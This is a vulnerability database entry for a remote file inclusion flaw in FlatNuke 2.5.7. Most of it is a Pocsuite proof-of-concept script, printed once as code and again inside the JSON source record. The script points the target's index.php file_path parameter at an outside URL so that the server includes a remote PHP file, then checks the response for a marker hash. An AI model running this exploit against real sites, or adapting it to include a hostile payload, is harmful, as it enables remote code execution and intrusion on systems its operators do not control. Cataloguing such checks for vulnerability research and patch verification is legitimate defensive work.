Search...

FlatNuke 2.5.7 Index.php Remote File Include Vulnerability

2014-07-01T00:00:00

ID SSV:81793
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class FlatNuke_Remote_File_Include(POCBase):
    vulID = '63616'
    version = '1'
    vulDate = '2006-07-13'
    author = ' '
    createDate = '2015-12-16'
    updateDate = ' '
    references = ['http://www.sebug.net/vuldb/ssvid-63616']
    name = 'FlatNuke 2.5.7 Index.php Remote File Include Vulnerability'
    appPowerLink = ''
    appName = 'FlatNuke'
    appVersion = '2.5.7'
    vulType = 'Remote File Inclusion'
    desc = ''
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self):
        result = {}
        vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
        response = req.get(vul_url).content

        if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url


        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(FlatNuke_Remote_File_Include)

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T15:28:11", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "href": "https://www.seebug.org/vuldb/ssvid-81793", "references": [], "enchantments_done": [], "id": "SSV:81793", "title": "FlatNuke 2.5.7 Index.php Remote File Include Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nimport re\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import Output, POCBase\r\nfrom pocsuite.utils import register\r\n\r\nclass FlatNuke_Remote_File_Include(POCBase):\r\n vulID = '63616'\r\n version = '1'\r\n vulDate = '2006-07-13'\r\n author = ' '\r\n createDate = '2015-12-16'\r\n updateDate = ' '\r\n references = ['http://www.sebug.net/vuldb/ssvid-63616']\r\n name = 'FlatNuke 2.5.7 Index.php Remote File Include Vulnerability'\r\n appPowerLink = ''\r\n appName = 'FlatNuke'\r\n appVersion = '2.5.7'\r\n vulType = 'Remote File Inclusion'\r\n desc = ''\r\n samples = ['']\r\n\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n\r\n def _verify(self):\r\n result = {}\r\n vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url\r\n response = req.get(vul_url).content\r\n\r\n if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = self.url\r\n\r\n\r\n return self.parse_attack(result)\r\n\r\n\r\n def parse_attack(self, result):\r\n output = Output(self)\r\n\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('failed')\r\n\r\n return output\r\n\r\nregister(FlatNuke_Remote_File_Include)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-81793", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645314486}}